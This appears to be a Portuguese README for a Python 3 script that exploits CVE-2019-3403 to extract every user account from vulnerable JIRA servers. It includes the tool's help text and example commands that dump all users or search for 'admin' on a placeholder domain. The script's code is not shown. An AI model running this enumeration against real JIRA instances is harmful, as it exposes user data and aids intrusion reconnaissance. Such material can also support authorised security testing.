
Um exploit simples em python3 para CVE-2019-3403
Eu queria conseguir explorar facilmente o CVE-2019-3403 para extrair todos os usuários de um aplicativo JIRA, então montei este script. Não é o código mais limpo do mundo e não lida com solicitações que retornam mais de 1000 usuários (ele simplesmente os truncará para os primeiros 1000) - mas pode extrair rapidamente todos os usuários de um servidor JIRA vulnerável.
usage: scrape_jira.py [-h] -d DOMAIN [-q QUERY] [-o OUT] [-v]
Scrape User Information from Vulnerable JIRA Instances [CVE-2019-3403]
optional arguments:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
The domain of the target
-q QUERY, --query QUERY
Specific query to run against the API
-o OUT, --out OUT Output to a file
-v, --verbose Verbose output
Extraia tudo e salve a saída em um arquivo:
python3 CVE-2019-3403.py -d jira.example.com -o out.txt -v
Apenas procure por um usuário específico:
python3 CVE-2019-3403.py -d jira.example.com -q admin